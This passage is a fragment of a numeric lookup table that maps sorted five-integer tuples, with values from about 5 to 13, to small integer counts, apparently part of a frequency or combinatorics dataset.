(5, 6, 7, 8, 9): 16,
(5, 6, 7, 8, 10): 9,
(5, 6, 7, 8, 11): 12,
(5, 6, 7, 8, 12): 14,
(5, 6, 7, 8, 13): 10,
(5, 6, 7, 9, 9): 17,
(5, 6, 7, 9, 10): 21,
(5, 6, 7, 9, 11): 9,
(5, 6, 7, 9, 12): 19,
(5, 6, 7, 9, 13): 7,
(5, 6, 7, 10, 10): 9,
(5, 6, 7, 10, 11): 11,
(5, 6, 7, 10, 12): 13,
(5, 6, 7, 10, 13): 14,
(5, 6, 7, 11, 11): 6,
(5, 6, 7, 11, 12): 17,
(5, 6, 7, 11, 13): 15,
(5, 6, 7, 12, 12): 15,
(5, 6, 7, 12, 13): 18,
(5, 6, 7, 13, 13): 7,
(5, 6, 8, 8, 8): 7,
(5, 6, 8, 8, 9): 5,
(5, 6, 8, 8, 10): 10,
(5, 6, 8, 8, 11): 9,
(5, 6, 8, 8, 12): 14,
(5, 6, 8, 8, 13): 5,
(5, 6, 8, 9, 9): 9,
(5, 6, 8, 9, 10): 19,
(5, 6, 8, 9, 11): 20,
(5, 6, 8, 9, 12): 17,
(5, 6, 8, 9, 13): 15,
(5, 6, 8, 10, 10): 12,
(5, 6, 8, 10, 11): 12,
(5, 6, 8, 10, 12): 15,
(5, 6, 8, 10, 13): 11,
(5, 6, 8, 11, 11): 6,
(5, 6, 8, 11, 12): 10,
(5, 6, 8, 11, 13): 7,
(5, 6, 8, 12, 12): 19,
(5, 6, 8, 12, 13): 10,
(5, 6, 8, 13, 13): 6,
(5, 6, 9, 9, 9): 12,
(5, 6, 9, 9, 10): 6,
(5, 6, 9, 9, 11): 9,
(5, 6, 9, 9, 12): 11,
(5, 6, 9, 9, 13): 8,
(5, 6, 9, 10, 10): 8,
(5, 6, 9, 10, 11): 14,
(5, 6, 9, 10, 12): 31,
(5, 6, 9, 10, 13): 12,
(5, 6, 9, 11, 11): 4,
(5, 6, 9, 11, 12): 15,
(5, 6, 9, 11, 13): 8,
(5, 6, 9, 12, 12): 8,
(5, 6, 9, 12, 13): 12,
(5, 6, 9, 13, 13): 4,
(5, 6, 10, 10, 10): 5,
(5, 6, 10, 10, 11): 9,
(5, 6, 10, 10, 12): 10,
(5, 6, 10, 10, 13): 10,
(5, 6, 10, 11, 11): 4,
(5, 6, 10, 11, 12): 12,
(5, 6, 10, 11, 13): 10,
(5, 6, 10, 12, 12): 12,
(5, 6, 10, 12, 13): 8,
(5, 6, 10, 13, 13): 1,
(5, 6, 11, 11, 11): 4,
(5, 6, 11, 11, 12): 6,
(5, 6, 11, 11, 13): 7,
(5, 6, 11, 12, 12): 10,
(5, 6, 11, 12, 13): 13,
(5, 6, 11, 13, 13): 6,
(5, 6, 12, 12, 12): 7,
(5, 6, 12, 12, 13): 12,
(5, 6, 12, 13, 13): 6,
(5, 6, 13, 13, 13): 5,
(5, 7, 7, 7, 7): 2,
(5, 7, 7, 7, 8): 6,
(5, 7, 7, 7, 9): 6,
(5, 7, 7, 7, 10): 8,
(5, 7, 7, 7, 11): 3,
(5, 7, 7, 7, 12): 8,
(5, 7, 7, 7, 13): 3,
(5, 7, 7, 8, 8): 1,
(5, 7, 7, 8, 9): 9,
(5, 7, 7, 8, 10): 14,
(5, 7, 7, 8, 11): 6,
(5, 7, 7, 8, 12): 11,
(5, 7, 7, 8, 13): 5,
(5, 7, 7, 9, 9): 4,
(5, 7, 7, 9, 10): 6,
(5, 7, 7, 9, 11): 8,
(5, 7, 7, 9, 12): 5,
(5, 7, 7, 9, 13): 5,
(5, 7, 7, 10, 10): 3,
(5, 7, 7, 10, 11): 5,
(5, 7, 7, 10, 12): 8,
(5, 7, 7, 10, 13): 8,
(5, 7, 7, 11, 11): 3,
(5, 7, 7, 11, 12): 6,
(5, 7, 7, 11, 13): 7,
(5, 7, 7, 12, 12): 6,
(5, 7, 7, 12, 13): 5,
(5, 7, 7, 13, 13): 1,
(5, 7, 8, 8, 8): 3,
(5, 7, 8, 8, 9): 11,
(5, 7, 8, 8, 10): 9,
(5, 7, 8, 8, 11): 7,
(5, 7, 8, 8, 12): 4,
(5, 7, 8, 8, 13): 8,
(5, 7, 8, 9, 9): 5,
(5, 7, 8, 9, 10): 11,
(5, 7, 8, 9, 11): 5,
(5, 7, 8, 9, 12): 17,
(5, 7, 8, 9, 13): 10,
(5, 7, 8, 10, 10): 9,
(5, 7, 8, 10, 11): 10,
(5, 7, 8, 10, 12): 23,
(5, 7, 8, 10, 13): 13,
(5, 7, 8, 11, 11): 5,
(5, 7, 8, 11, 12): 11,
(5, 7, 8, 11, 13): 6,
(5, 7, 8, 12, 12): 5,
(5, 7, 8, 12, 13): 8,
(5, 7, 8, 13, 13): 3,
(5, 7, 9, 9, 9): 1,
(5, 7, 9, 9, 10): 6,
(5, 7, 9, 9, 11): 6,
(5, 7, 9, 9, 12): 15,
(5, 7, 9, 9, 13): 5,
(5, 7, 9, 10, 10): 10,
(5, 7, 9, 10, 11): 15,
(5, 7, 9, 10, 12): 14,
(5, 7, 9, 10, 13): 10,
(5, 7, 9, 11, 11): 3,
(5, 7, 9, 11, 12): 4,
(5, 7, 9, 11, 13): 11,
(5, 7, 9, 12, 12): 7,
(5, 7, 9, 12, 13): 9,
(5, 7, 9, 13, 13): 3,
(5, 7, 10, 10, 10): 6,
(5, 7, 10, 10, 11): 7,
(5, 7, 10, 10, 12): 8,
(5, 7, 10, 10, 13): 7,
(5, 7, 10, 11, 11): 8,
(5, 7, 10, 11, 12): 12,
(5, 7, 10, 11, 13): 6,
(5, 7, 10, 12, 12): 4,
(5, 7, 10, 12, 13): 10,
(5, 7, 10, 13, 13): 7,
(5, 7, 11, 11, 11): 3,
(5, 7, 11, 11, 12): 9,
(5, 7, 11, 12, 12): 7,
(5, 7, 11, 12, 13): 9,
(5, 7, 11, 13, 13): 2,
(5, 7, 12, 12, 12): 5,
(5, 7, 12, 12, 13): 6,
(5, 7, 12, 13, 13): 4,
(5, 7, 13, 13, 13): 1,
(5, 8, 8, 8, 8): 1,
(5, 8, 8, 8, 9): 2,
(5, 8, 8, 8, 10): 4,
(5, 8, 8, 8, 11): 2,
(5, 8, 8, 8, 12): 2,
(5, 8, 8, 8, 13): 2,
(5, 8, 8, 9, 9): 3,
(5, 8, 8, 9, 10): 9,
(5, 8, 8, 9, 11): 6,
(5, 8, 8, 9, 12): 4,
(5, 8, 8, 9, 13): 7,
(5, 8, 8, 10, 10): 5,
(5, 8, 8, 10, 11): 4,
(5, 8, 8, 10, 12): 14,
(5, 8, 8, 10, 13): 7,
(5, 8, 8, 11, 11): 2,
(5, 8, 8, 11, 12): 3,
(5, 8, 8, 11, 13): 10,
(5, 8, 8, 12, 12): 1,
(5, 8, 8, 12, 13): 1,
(5, 8, 9, 9, 9): 2,
(5, 8, 9, 9, 10): 2,
(5, 8, 9, 9, 11): 7,
(5, 8, 9, 9, 12): 8,
(5, 8, 9, 9, 13): 4,
(5, 8, 9, 10, 10): 6,
(5, 8, 9, 10, 11): 13,
(5, 8, 9, 10, 12): 5,
(5, 8, 9, 10, 13): 6,
(5, 8, 9, 11, 11): 2,
(5, 8, 9, 11, 12): 13,
(5, 8, 9, 11, 13): 7,
(5, 8, 9, 12, 12): 12,
(5, 8, 9, 12, 13): 9,
(5, 8, 9, 13, 13): 3,
(5, 8, 10, 10, 10): 5,
(5, 8, 10, 10, 11): 7,
(5, 8, 10, 10, 12): 10,
(5, 8, 10, 10, 13): 4,
(5, 8, 10, 11, 11): 6,
(5, 8, 10, 11, 12): 12,
(5, 8, 10, 11, 13): 4,
(5, 8, 10, 12, 12): 14,
(5, 8, 10, 12, 13): 15,
(5, 8, 10, 13, 13): 10,
(5, 8, 11, 11, 11): 4,
(5, 8, 11, 11, 12): 4,
(5, 8, 11, 11, 13): 2,
(5, 8, 11, 12, 12): 5,
(5, 8, 11, 12, 13): 12,
(5, 8, 11, 13, 13): 5,
(5, 8, 12, 12, 12): 2,
(5, 8, 12, 12, 13): 1,
(5, 8, 12, 13, 13): 3,
(5, 8, 13, 13, 13): 3,
(5, 9, 9, 9, 10): 2,
(5, 9, 9, 9, 12): 3,
(5, 9, 9, 10, 10): 1,
(5, 9, 9, 10, 11): 3,
(5, 9, 9, 10, 12): 9,
(5, 9, 9, 10, 13): 5,
(5, 9, 9, 11, 11): 3,
(5, 9, 9, 11, 12): 9,
(5, 9, 9, 11, 13): 2,
(5, 9, 9, 12, 12): 6,
(5, 9, 9, 12, 13): 8,
(5, 9, 9, 13, 13): 1,
(5, 9, 10, 10, 10): 1,
(5, 9, 10, 10, 11): 2,
(5, 9, 10, 10, 12): 7,
(5, 9, 10, 10, 13): 10,
(5, 9, 10, 11, 11): 5,
(5, 9, 10, 11, 12): 12,
(5, 9, 10, 11, 13): 8,
(5, 9, 10, 12, 12): 10,
(5, 9, 10, 12, 13): 10,
(5, 9, 10, 13, 13): 4,
(5, 9, 11, 11, 11): 1,
(5, 9, 11, 11, 12): 5,
(5, 9, 11, 11, 13): 5,
(5, 9, 11, 12, 12): 5,
(5, 9, 11, 12, 13): 3,
(5, 9, 11, 13, 13): 2,
(5, 9, 12, 12, 12): 1,
(5, 9, 12, 12, 13): 3,
(5, 9, 12, 13, 13): 2,
(5, 10, 10, 10, 10): 1,
(5, 10, 10, 10, 11): 4,
(5, 10, 10, 10, 12): 3,
(5, 10, 10, 10, 13): 3,
(5, 10, 10, 11, 11): 2,
(5, 10, 10, 11, 12): 3,
(5, 10, 10, 11, 13): 5,
(5, 10, 10, 12, 12): 2,
(5, 10, 10, 12, 13): 4,
(5, 10, 10, 13, 13): 2,
(5, 10, 11, 11, 12): 2,
(5, 10, 11, 11, 13): 7,
(5, 10, 11, 12, 12): 1,
(5, 10, 11, 12, 13): 9,
(5, 10, 11, 13, 13): 3,
(5, 10, 12, 12, 12): 3,
(5, 10, 12, 12, 13): 4,
(5, 10, 12, 13, 13): 5,
(5, 10, 13, 13, 13): 2,
(5, 11, 11, 11, 12): 1,
(5, 11, 11, 11, 13): 2,
(5, 11, 11, 12, 12): 3,
(5, 11, 11, 12, 13): 4,
(5, 11, 11, 13, 13): 1,
(5, 11, 12, 12, 12): 2,
(5, 11, 12, 12, 13): 3,
(5, 11, 12, 13, 13): 9,
(5, 11, 13, 13, 13): 2,
(5, 12, 12, 12, 13): 1,
(5, 12, 12, 13, 13): 1,
(5, 12, 13, 13, 13): 1,
(6, 6, 6, 6, 6): 1,
(6, 6, 6, 6, 7): 2,
(6, 6, 6, 6, 8): 1,
(6, 6, 6, 6, 9): 2,
(6, 6, 6, 6, 10): 2,
(6, 6, 6, 6, 11): 2,
(6, 6, 6, 6, 12): 3,
(6, 6, 6, 6, 13): 1,
(6, 6, 6, 7, 7): 8,
(6, 6, 6, 7, 8): 9,
(6, 6, 6, 7, 9): 2,
(6, 6, 6, 7, 10): 2,
(6, 6, 6, 7, 11): 4,
(6, 6, 6, 7, 12): 5,
(6, 6, 6, 7, 13): 9,
(6, 6, 6, 8, 8): 2,
(6, 6, 6, 8, 9): 9,
(6, 6, 6, 8, 10): 3,
(6, 6, 6, 8, 11): 2,
(6, 6, 6, 8, 12): 10,
(6, 6, 6, 8, 13): 4,
(6, 6, 6, 9, 9): 3,
(6, 6, 6, 9, 10): 5,
(6, 6, 6, 9, 11): 5,
(6, 6, 6, 9, 12): 10,
(6, 6, 6, 9, 13): 3,
(6, 6, 6, 10, 10): 1,
(6, 6, 6, 10, 11): 2,
(6, 6, 6, 10, 12): 4,
(6, 6, 6, 10, 13): 2,
(6, 6, 6, 11, 11): 1,
(6, 6, 6, 11, 12): 3,
(6, 6, 6, 11, 13): 4,
(6, 6, 6, 12, 12): 6,
(6, 6, 6, 12, 13): 3,
(6, 6, 6, 13, 13): 2,
(6, 6, 7, 7, 7): 8,
(6, 6, 7, 7, 8): 13,
(6, 6, 7, 7, 9): 4,
(6, 6, 7, 7, 11): 1,
(6, 6, 7, 7, 12): 10,
(6, 6, 7, 7, 13): 2,
(6, 6, 7, 8, 8): 4,
(6, 6, 7, 8, 9): 17,
(6, 6, 7, 8, 10): 7,
(6, 6, 7, 8, 11): 3,
(6, 6, 7, 8, 12): 9,
(6, 6, 7, 8, 13): 8,
(6, 6, 7, 9, 9): 8,
(6, 6, 7, 9, 10): 14,
(6, 6, 7, 9, 11): 4,
(6, 6, 7, 9, 12): 13,
(6, 6, 7, 9, 13): 4,
(6, 6, 7, 10, 10): 7,
(6, 6, 7, 10, 11): 12,
(6, 6, 7, 10, 12): 8,
(6, 6, 7, 10, 13): 2,
(6, 6, 7, 11, 11): 5,
(6, 6, 7, 11, 12): 11,
(6, 6, 7, 11, 13): 6,
(6, 6, 7, 12, 12): 4,
(6, 6, 7, 12, 13): 14,
(6, 6, 7, 13, 13): 7,
(6, 6, 8, 8, 8): 2,
(6, 6, 8, 8, 9): 7,
(6, 6, 8, 8, 10): 8,
(6, 6, 8, 8, 11): 4,
(6, 6, 8, 8, 12): 11,
(6, 6, 8, 8, 13): 2,
(6, 6, 8, 9, 9): 6,
(6, 6, 8, 9, 10): 11,
(6, 6, 8, 9, 11): 8,
(6, 6, 8, 9, 12): 16,
(6, 6, 8, 9, 13): 5,
(6, 6, 8, 10, 10): 6,
(6, 6, 8, 10, 11): 8,
(6, 6, 8, 10, 12): 17,
(6, 6, 8, 10, 13): 7,
(6, 6, 8, 11, 11): 3,
(6, 6, 8, 11, 12): 8,
(6, 6, 8, 11, 13): 5,
(6, 6, 8, 12, 12): 7,
(6, 6, 8, 12, 13): 6,
(6, 6, 8, 13, 13): 1,
(6, 6, 9, 9, 9): 4,
(6, 6, 9, 9, 10): 7,
(6, 6, 9, 9, 11): 8,
(6, 6, 9, 9, 12): 13,
(6, 6, 9, 9, 13): 3,
(6, 6, 9, 10, 10): 2,
(6, 6, 9, 10, 11): 8,
(6, 6, 9, 10, 12): 21,
(6, 6, 9, 10, 13): 7,
(6, 6, 9, 11, 11): 3,
(6, 6, 9, 11, 12): 13,
(6, 6, 9, 11, 13): 6,
(6, 6, 9, 12, 12): 15,
(6, 6, 9, 12, 13): 4,
(6, 6, 9, 13, 13): 1,
(6, 6, 10, 10, 10): 2,
(6, 6, 10, 10, 11): 1,
(6, 6, 10, 10, 12): 12,
(6, 6, 10, 10, 13): 4,
(6, 6, 10, 11, 12): 7,
(6, 6, 10, 11, 13): 5,
(6, 6, 10, 12, 12): 13,
(6, 6, 10, 12, 13): 7,
(6, 6, 10, 13, 13): 1,
(6, 6, 11, 11, 11): 1,
(6, 6, 11, 11, 12): 3,
(6, 6, 11, 11, 13): 2,
(6, 6, 11, 12, 12): 8,
(6, 6, 11, 12, 13): 7,
(6, 6, 11, 13, 13): 1,
(6, 6, 12, 12, 12): 7,
(6, 6, 12, 12, 13): 3,
(6, 6, 12, 13, 13): 5,
(6, 6, 13, 13, 13): 2,
(6, 7, 7, 7, 7): 2,
(6, 7, 7, 7, 8): 13,
(6, 7, 7, 7, 9): 5,
(6, 7, 7, 7, 10): 3,
(6, 7, 7, 7, 11): 3,
(6, 7, 7, 7, 12): 4,
(6, 7, 7, 7, 13): 9,
(6, 7, 7, 8, 8): 8,
(6, 7, 7, 8, 9): 10,
(6, 7, 7, 8, 10): 8,
(6, 7, 7, 8, 11): 5,
(6, 7, 7, 8, 12): 9,
(6, 7, 7, 8, 13): 7,
(6, 7, 7, 9, 9): 8,
(6, 7, 7, 9, 10): 12,
(6, 7, 7, 9, 11): 8,
(6, 7, 7, 9, 12): 10,
(6, 7, 7, 9, 13): 5,
(6, 7, 7, 10, 10): 3,
(6, 7, 7, 10, 11): 12,
(6, 7, 7, 10, 12): 13,
(6, 7, 7, 10, 13): 2,
(6, 7, 7, 11, 11): 5,
(6, 7, 7, 11, 12): 12,
(6, 7, 7, 11, 13): 4,
(6, 7, 7, 12, 12): 4,
(6, 7, 7, 12, 13): 12,
(6, 7, 7, 13, 13): 7,
(6, 7, 8, 8, 8): 5,
(6, 7, 8, 8, 9): 6,
(6, 7, 8, 8, 10): 10,
(6, 7, 8, 8, 11): 4,
(6, 7, 8, 8, 12): 10,
(6, 7, 8, 8, 13): 10,
(6, 7, 8, 9, 9): 9,
(6, 7, 8, 9, 10): 11,
(6, 7, 8, 9, 11): 14,
(6, 7, 8, 9, 12): 21,
(6, 7, 8, 9, 13): 16,
(6, 7, 8, 10, 10): 6,
(6, 7, 8, 10, 11): 14,
(6, 7, 8, 10, 12): 17,
(6, 7, 8, 10, 13): 8,
(6, 7, 8, 11, 11): 6,
(6, 7, 8, 11, 12): 12,
(6, 7, 8, 11, 13): 7,
(6, 7, 8, 12, 12): 15,
(6, 7, 8, 12, 13): 9,
(6, 7, 8, 13, 13): 7,
(6, 7, 9, 9, 9): 6,
(6, 7, 9, 9, 10): 8,
(6, 7, 9, 9, 11): 11,
(6, 7, 9, 9, 12): 13,
(6, 7, 9, 9, 13): 6,
(6, 7, 9, 10, 10): 6,
(6, 7, 9, 10, 11): 9,
(6, 7, 9, 10, 12): 17,
(6, 7, 9, 10, 13): 17,
(6, 7, 9, 11, 11): 4,
(6, 7, 9, 11, 12): 10,
(6, 7, 9, 11, 13): 7,
(6, 7, 9, 12, 12): 15,
(6, 7, 9, 12, 13): 11,
(6, 7, 9, 13, 13): 1,
(6, 7, 10, 10, 10): 3,
(6, 7, 10, 10, 11): 6,
(6, 7, 10, 10, 12): 6,
(6, 7, 10, 10, 13): 5,
(6, 7, 10, 11, 11): 4,
(6, 7, 10, 11, 12): 16,
(6, 7, 10, 11, 13): 8,
(6, 7, 10, 12, 12): 16,
(6, 7, 10, 12, 13): 11,
(6, 7, 10, 13, 13): 3,
(6, 7, 11, 11, 11): 3,
(6, 7, 11, 11, 12): 6,
(6, 7, 11, 11, 13): 7,
(6, 7, 11, 12, 12): 8,
(6, 7, 11, 12, 13): 13,
(6, 7, 11, 13, 13): 4,
(6, 7, 12, 12, 12): 7,
(6, 7, 12, 12, 13): 9,
(6, 7, 12, 13, 13): 5,
(6, 7, 13, 13, 13): 6,
(6, 8, 8, 8, 8): 2,
(6, 8, 8, 8, 9): 2,
(6, 8, 8, 8, 10): 5,
(6, 8, 8, 8, 11): 3,
(6, 8, 8, 8, 12): 4,
(6, 8, 8, 8, 13): 3,
(6, 8, 8, 9, 10): 6,
(6, 8, 8, 9, 11): 7,
(6, 8, 8, 9, 12): 16,
(6, 8, 8, 9, 13): 4,
(6, 8, 8, 10, 10): 5,
(6, 8, 8, 10, 11): 4,
(6, 8, 8, 10, 12): 12,
(6, 8, 8, 10, 13): 6,
(6, 8, 8, 11, 11): 1,
(6, 8, 8, 11, 12): 7,
(6, 8, 8, 11, 13): 6,
(6, 8, 8, 12, 12): 6,
(6, 8, 8, 12, 13): 6,
(6, 8, 8, 13, 13): 1,
(6, 8, 9, 9, 9): 4,
(6, 8, 9, 9, 10): 8,
(6, 8, 9, 9, 11): 8,
(6, 8, 9, 9, 12): 12,
(6, 8, 9, 9, 13): 5,
(6, 8, 9, 10, 10): 7,
(6, 8, 9, 10, 11): 8,
(6, 8, 9, 10, 12): 18,
(6, 8, 9, 10, 13): 9,
(6, 8, 9, 11, 11): 9,
(6, 8, 9, 11, 12): 7,
(6, 8, 9, 11, 13): 12,
(6, 8, 9, 12, 12): 19,
(6, 8, 9, 12, 13): 10,
(6, 8, 9, 13, 13): 2,
(6, 8, 10, 10, 10): 5,
(6, 8, 10, 10, 11): 8,
(6, 8, 10, 10, 12): 11,
(6, 8, 10, 10, 13): 4,
(6, 8, 10, 11, 11): 3,
(6, 8, 10, 11, 12): 14,
(6, 8, 10, 11, 13): 10,
(6, 8, 10, 12, 12): 17,
(6, 8, 10, 12, 13): 13,
(6, 8, 10, 13, 13): 5,
(6, 8, 11, 11, 11): 1,
(6, 8, 11, 11, 12): 6,
(6, 8, 11, 11, 13): 4,
(6, 8, 11, 12, 12): 15,
(6, 8, 11, 12, 13): 5,
(6, 8, 11, 13, 13): 2,
(6, 8, 12, 12, 12): 10,
(6, 8, 12, 12, 13): 7,
(6, 8, 12, 13, 13): 3,
(6, 8, 13, 13, 13): 1,
(6, 9, 9, 9, 9): 2,
(6, 9, 9, 9, 10): 1,
(6, 9, 9, 9, 11): 4,
(6, 9, 9, 9, 12): 3,
(6, 9, 9, 9, 13): 9,
(6, 9, 9, 10, 10): 1,
(6, 9, 9, 10, 11): 5,
(6, 9, 9, 10, 12): 11,
(6, 9, 9, 10, 13): 5,
(6, 9, 9, 11, 11): 4,
(6, 9, 9, 11, 12): 11,
(6, 9, 9, 11, 13): 4,
(6, 9, 9, 12, 12): 7,
(6, 9, 9, 12, 13): 9,
(6, 9, 9, 13, 13): 2,
(6, 9, 10, 10, 10): 1,
(6, 9, 10, 10, 11): 3,
(6, 9, 10, 10, 12): 10,
(6, 9, 10, 10, 13): 5,
(6, 9, 10, 11, 11): 3,
(6, 9, 10, 11, 12): 12,
(6, 9, 10, 11, 13): 17,
(6, 9, 10, 12, 12): 8,
(6, 9, 10, 12, 13): 9,
(6, 9, 10, 13, 13): 4,
(6, 9, 11, 11, 11): 2,
(6, 9, 11, 11, 12): 4,
(6, 9, 11, 11, 13): 5,
(6, 9, 11, 12, 12): 10,
(6, 9, 11, 12, 13): 13,
(6, 9, 11, 13, 13): 1,
(6, 9, 12, 12, 12): 11,
(6, 9, 12, 12, 13): 11,
(6, 9, 12, 13, 13): 2,
(6, 9, 13, 13, 13): 4,
(6, 10, 10, 10, 12): 4,
(6, 10, 10, 10, 13): 1,
(6, 10, 10, 11, 11): 1,
(6, 10, 10, 11, 12): 4,
(6, 10, 10, 11, 13): 5,
(6, 10, 10, 12, 12): 5,
(6, 10, 10, 12, 13): 9,
(6, 10, 10, 13, 13): 1,
(6, 10, 11, 11, 11): 1,
(6, 10, 11, 11, 12): 2,
(6, 10, 11, 11, 13): 2,
(6, 10, 11, 12, 12): 5,
(6, 10, 11, 12, 13): 7,
(6, 10, 11, 13, 13): 6,
(6, 10, 12, 12, 12): 6,
(6, 10, 12, 12, 13): 14,
(6, 10, 12, 13, 13): 5,
(6, 10, 13, 13, 13): 1,
(6, 11, 11, 11, 13): 2,
(6, 11, 11, 12, 12): 2,
(6, 11, 11, 12, 13): 6,
(6, 11, 11, 13, 13): 2,
(6, 11, 12, 12, 12): 2,
(6, 11, 12, 12, 13): 7,
(6, 11, 12, 13, 13): 5,
(6, 11, 13, 13, 13): 1,
(6, 12, 12, 12, 12): 1,
(6, 12, 12, 12, 13): 1,
(7, 7, 7, 7, 7): 1,
(7, 7, 7, 7, 8): 4,
(7, 7, 7, 7, 9): 3,
(7, 7, 7, 7, 11): 2,
(7, 7, 7, 7, 12): 2,
(7, 7, 7, 7, 13): 1,
(7, 7, 7, 8, 8): 2,
(7, 7, 7, 8, 9): 2,
(7, 7, 7, 8, 10): 3,
(7, 7, 7, 8, 11): 1,
(7, 7, 7, 8, 12): 3,
(7, 7, 7, 8, 13): 6,
(7, 7, 7, 9, 9): 1,
(7, 7, 7, 9, 10): 5,
(7, 7, 7, 9, 11): 4,
(7, 7, 7, 9, 12): 7,
(7, 7, 7, 9, 13): 3,
(7, 7, 7, 10, 10): 2,
(7, 7, 7, 10, 11): 5,
(7, 7, 7, 10, 12): 3,
(7, 7, 7, 10, 13): 1,
(7, 7, 7, 11, 11): 1,
(7, 7, 7, 11, 12): 2,
(7, 7, 7, 11, 13): 3,
(7, 7, 7, 12, 12): 2,
(7, 7, 7, 12, 13): 1,
(7, 7, 7, 13, 13): 2,
(7, 7, 8, 8, 8): 4,
(7, 7, 8, 8, 9): 3,
(7, 7, 8, 8, 10): 3,
(7, 7, 8, 8, 11): 2,
(7, 7, 8, 8, 12): 4,
(7, 7, 8, 8, 13): 3,
(7, 7, 8, 9, 9): 2,
(7, 7, 8, 9, 10): 8,
(7, 7, 8, 9, 11): 8,
(7, 7, 8, 9, 12): 8,
(7, 7, 8, 9, 13): 3,
(7, 7, 8, 10, 10): 7,
(7, 7, 8, 10, 11): 8,
(7, 7, 8, 10, 12): 7,
(7, 7, 8, 10, 13): 7,
(7, 7, 8, 11, 11): 3,
(7, 7, 8, 11, 12): 3,
(7, 7, 8, 11, 13): 4,
(7, 7, 8, 12, 12): 5,
(7, 7, 8, 12, 13): 5,
(7, 7, 8, 13, 13): 4,
(7, 7, 9, 9, 9): 1,
(7, 7, 9, 9, 10): 4,
(7, 7, 9, 9, 11): 2,
(7, 7, 9, 9, 12): 9,
(7, 7, 9, 9, 13): 3,
(7, 7, 9, 10, 10): 1,
(7, 7, 9, 10, 11): 5,
(7, 7, 9, 10, 12): 8,
(7, 7, 9, 10, 13): 5,
(7, 7, 9, 11, 11): 4,
(7, 7, 9, 11, 12): 6,
(7, 7, 9, 11, 13): 6,
(7, 7, 9, 12, 12): 4,
(7, 7, 9, 12, 13): 2,
(7, 7, 10, 10, 10): 1,
(7, 7, 10, 10, 11): 3,
(7, 7, 10, 10, 12): 4,
(7, 7, 10, 10, 13): 5,
(7, 7, 10, 11, 12): 5,
(7, 7, 10, 11, 13): 5,
(7, 7, 10, 12, 12): 3,
(7, 7, 10, 12, 13): 3,
(7, 7, 10, 13, 13): 1,
(7, 7, 11, 11, 11): 1,
(7, 7, 11, 11, 12): 1,
(7, 7, 11, 11, 13): 3,
(7, 7, 11, 12, 12): 3,
(7, 7, 11, 12, 13): 4,
(7, 7, 11, 13, 13): 1,
(7, 7, 12, 12, 12): 2,
(7, 7, 12, 12, 13): 2,
(7, 7, 12, 13, 13): 2,
(7, 7, 13, 13, 13): 2,
(7, 8, 8, 8, 8): 1,
(7, 8, 8, 8, 11): 1,
(7, 8, 8, 8, 12): 3,
(7, 8, 8, 8, 13): 3,
(7, 8, 8, 9, 9): 1,
(7, 8, 8, 9, 10): 6,
(7, 8, 8, 9, 11): 3,
(7, 8, 8, 9, 12): 4,
(7, 8, 8, 9, 13): 7,
(7, 8, 8, 10, 10): 5,
(7, 8, 8, 10, 11): 4,
(7, 8, 8, 10, 12): 8,
(7, 8, 8, 10, 13): 3,
(7, 8, 8, 11, 11): 4,
(7, 8, 8, 11, 13): 3,
(7, 8, 8, 12, 12): 1,
(7, 8, 8, 12, 13): 2,
(7, 8, 8, 13, 13): 1,
(7, 8, 9, 9, 9): 2,
(7, 8, 9, 9, 10): 2,
(7, 8, 9, 9, 11): 2,
(7, 8, 9, 9, 12): 8,
(7, 8, 9, 9, 13): 4,
(7, 8, 9, 10, 10): 4,
(7, 8, 9, 10, 11): 8,
(7, 8, 9, 10, 12): 14,
(7, 8, 9, 10, 13): 10,
(7, 8, 9, 11, 11): 2,
(7, 8, 9, 11, 12): 15,
(7, 8, 9, 11, 13): 4,
(7, 8, 9, 12, 12): 9,
(7, 8, 9, 12, 13): 8,
(7, 8, 9, 13, 13): 2,
(7, 8, 10, 10, 10): 2,
(7, 8, 10, 10, 11): 2,
(7, 8, 10, 10, 12): 8,
(7, 8, 10, 10, 13): 7,
(7, 8, 10, 11, 11): 5,
(7, 8, 10, 11, 12): 8,
(7, 8, 10, 11, 13): 16,
(7, 8, 10, 12, 12): 10,
(7, 8, 10, 12, 13): 7,
(7, 8, 10, 13, 13): 3,
(7, 8, 11, 11, 11): 1,
(7, 8, 11, 11, 12): 1,
(7, 8, 11, 11, 13): 5,
(7, 8, 11, 12, 12): 1,
(7, 8, 11, 12, 13): 9,
(7, 8, 11, 13, 13): 1,
(7, 8, 12, 12, 12): 4,
(7, 8, 12, 12, 13): 5,
(7, 8, 12, 13, 13): 5,
(7, 8, 13, 13, 13): 4,
(7, 9, 9, 9, 12): 7,
(7, 9, 9, 10, 10): 1,
(7, 9, 9, 10, 11): 3,
(7, 9, 9, 10, 12): 5,
(7, 9, 9, 10, 13): 10,
(7, 9, 9, 11, 11): 1,
(7, 9, 9, 11, 12): 5,
(7, 9, 9, 11, 13): 6,
(7, 9, 9, 12, 12): 7,
(7, 9, 9, 12, 13): 3,
(7, 9, 9, 13, 13): 1,
(7, 9, 10, 10, 11): 1,
(7, 9, 10, 10, 12): 6,
(7, 9, 10, 10, 13): 2,
(7, 9, 10, 11, 11): 7,
(7, 9, 10, 11, 12): 10,
(7, 9, 10, 11, 13): 4,
(7, 9, 10, 12, 12): 6,
(7, 9, 10, 12, 13): 13,
(7, 9, 10, 13, 13): 1,
(7, 9, 11, 11, 11): 1,
(7, 9, 11, 11, 12): 5,
(7, 9, 11, 11, 13): 2,
(7, 9, 11, 12, 12): 6,
(7, 9, 11, 12, 13): 5,
(7, 9, 11, 13, 13): 5,
(7, 9, 12, 12, 12): 2,
(7, 9, 12, 12, 13): 5,
(7, 9, 12, 13, 13): 3,
(7, 10, 10, 10, 12): 3,
(7, 10, 10, 10, 13): 1,
(7, 10, 10, 11, 12): 5,
(7, 10, 10, 11, 13): 4,
(7, 10, 10, 12, 12): 1,
(7, 10, 10, 12, 13): 3,
(7, 10, 10, 13, 13): 5,
(7, 10, 11, 11, 12): 2,
(7, 10, 11, 11, 13): 4,
(7, 10, 11, 12, 12): 4,
(7, 10, 11, 12, 13): 7,
(7, 10, 11, 13, 13): 2,
(7, 10, 12, 12, 12): 3,
(7, 10, 12, 12, 13): 2,
(7, 10, 12, 13, 13): 7,
(7, 10, 13, 13, 13): 2,
(7, 11, 11, 11, 12): 1,
(7, 11, 11, 11, 13): 2,
(7, 11, 11, 12, 12): 1,
(7, 11, 11, 12, 13): 5,
(7, 11, 11, 13, 13): 3,
(7, 11, 12, 12, 13): 8,
(7, 11, 12, 13, 13): 1,
(7, 12, 12, 12, 12): 1,
(7, 12, 12, 12, 13): 1,
(7, 12, 13, 13, 13): 1,
(8, 8, 8, 8, 10): 1,
(8, 8, 8, 8, 12): 1,
(8, 8, 8, 8, 13): 1,
(8, 8, 8, 9, 9): 1,
